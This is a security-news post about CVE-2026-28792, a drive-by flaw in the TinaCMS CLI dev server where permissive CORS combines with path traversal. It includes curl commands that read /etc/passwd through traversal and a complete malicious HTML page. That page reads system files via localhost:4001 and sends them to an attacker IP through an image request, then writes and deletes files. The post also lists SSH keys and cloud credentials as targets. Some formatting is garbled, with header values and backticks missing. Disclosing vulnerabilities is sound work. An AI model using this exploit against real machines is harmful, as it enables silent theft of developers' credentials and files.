TinaCMS Drive-by Attack, CVE-2026-28792 (Critical)

Listen to this Post

The TinaCMS CLI dev server contains a critical vulnerability (CVE-2026-28792) that allows a drive-by attack on developers’ machines . The issue combines two flaws: a permissive CORS configuration (Access-Control-Allow-Origin: `) and a path traversal vulnerability in the media endpoints . When a developer runs `tinacms dev (default port 4001), the server allows cross-origin requests from any website . If the developer visits a malicious site while the server is running, the site’s JavaScript can make fetch requests to `localhost:4001` . The browser allows reading responses due to CORS, and the path traversal (e.g., ../../../etc/passwd) lets requests escape the media directory . Attackers can silently read, write, or delete arbitrary files on the developer’s system, as demonstrated in the official proof-of-concept . The vulnerability affects all versions prior to 2.1.8 and requires no special server configuration beyond the default setup .

DailyCVE Form:

Platform: TinaCMS
Version: <2.1.8
Vulnerability : Drive-by Attack
Severity: CRITICAL (9.6)
date: March 12, 2026

Prediction: Patched in 2.1.8

What Undercode Say:

Analytics:

The attack chain relies on two specific code patterns. First, the CORS headers are set to allow all origins in the server configuration:

Vulnerable CORS configuration in TinaCMS <2.1.8
File: packages/@tinacms/cli/src/server/server.ts
app.use(cors()); No options = permissive
File: packages/@tinacms/cli/src/next/vite/plugins.ts
server.middlewares.use(cors()); Also permissive

Second, the path traversal exists in media endpoint handling. Developers can test if their server is vulnerable by attempting a local path traversal:

Test for path traversal on a running TinaCMS dev server
curl -v "http://localhost:4001/../../../etc/passwd"
If vulnerable, this returns the contents of /etc/passwd
Check the effective CORS policy
curl -v -H "Origin: http://evil.com" http://localhost:4001/ | grep -i "access-control"
Vulnerable response includes: Access-Control-Allow-Origin:

Exploit:

The exploit requires a malicious webpage. When a developer visits it while `tinacms dev` is running, the following JavaScript executes silently:

<!-- Save as evil.html and host on attacker server -->
<!DOCTYPE html>
<html>
<body>

<h1>Loading page...</h1>

<script>
// Target the TinaCMS dev server on localhost
const TINA_URL = 'http://localhost:4001';
// Exfiltration endpoint (attacker's server)
const EXFIL_URL = 'http://192.168.11.117:8080/exfil';
// Read sensitive system file
fetch(TINA_URL + '/../../../etc/passwd')
.then(response => response.text())
.then(data => {
// Exfiltrate via image request (no CORS restrictions on images)
const img = new Image();
img.src = EXFIL_URL + '?data=' + encodeURIComponent(data);
// Also write a proof-of-concept file
return fetch(TINA_URL + '/media/upload/../../pwned.txt', {
method: 'POST',
body: 'PWNED'
});
})
.then(() => {
// Delete the file we just wrote (demonstrate full control)
fetch(TINA_URL + '/media/../../pwned.txt', { method: 'DELETE' });
})
.catch(err => console.log('Exploit attempt completed', err));
</script>

</body>
</html>

Protection:

Protecting against this CVE requires multiple layers:

Immediate fix: Update TinaCMS
npm update @tinacms/cli
Verify version is 2.1.8 or higher
npm list @tinacms/cli
If unable to update immediately, workaround:
Stop the dev server when not actively using it
pkill -f "tinacms dev"
For development workflows, restrict dev server to local-only
by adding explicit CORS configuration:
node -e "
const fs = require('fs');
const path = './node_modules/@tinacms/cli/src/server/server.ts';
let content = fs.readFileSync(path, 'utf8');
content = content.replace('app.use(cors());',
'app.use(require(\'cors\')({ origin: false }));');
fs.writeFileSync(path, content);
console.log('Patched CORS to disallow cross-origin');
"
Monitor for exploitation attempts
sudo tcpdump -i lo port 4001 -A | grep -i ".."
Block cross-origin requests at browser level with extension
(e.g., uBlock Origin in medium mode)

Impact:

A successful attack achieves complete filesystem compromise:

  • Read Access: Attackers can read any file the developer has access to, including SSH private keys (~/.ssh/id_rsa), cloud credentials (~/.aws/credentials), environment variables (.env files with API keys), and source code .
  • Write Access: Files can be written anywhere, allowing backdoors in project source, malicious scripts in startup directories, or configuration changes .
  • Delete Access: Arbitrary file deletion can cause data loss, destroy project files, or remove security tools .
  • Detection Difficulty: The attack happens entirely in the browser. No suspicious network connections appear from the victim machine except to the attacker’s server (for exfiltration). The developer only needs to visit a website—no downloads or clicks required .
  • Persistence: Written backdoors survive server restarts and can be committed to version control, affecting the entire team .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top